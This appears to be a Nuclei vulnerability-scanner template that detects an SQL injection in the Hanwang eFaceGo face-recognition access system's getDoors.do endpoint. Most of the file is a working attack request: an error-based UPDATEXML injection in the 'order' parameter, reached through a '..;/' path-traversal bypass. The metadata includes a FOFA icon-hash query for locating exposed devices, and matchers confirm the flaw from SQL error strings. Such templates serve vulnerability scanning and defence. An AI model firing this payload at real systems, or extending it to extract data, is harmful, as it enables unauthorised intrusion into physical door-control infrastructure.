id: hanwang-getDoors-sqli
info:
  name: hanwang getDoors.do - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - 
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: icon_hash="1380907357"
    tips:
    repair:
    version:
  tags: hanwang,efacego,sqli

http:
  - raw:
      - |
        GET /manage/intercom/..;/..;/manage/firstPeopleOpen/getDoors.do?page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x2e,0x71716a7071,(SELECT+(ELT(2920=2920,1))),0x71706b7671),8357)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        Connection: close
        
    matchers:
      - type: dsl
        name: getDoors.do
        dsl:
          - status_code == 200
          - contains_all(body,'XPATH','SQLException')
        condition: and
  
  
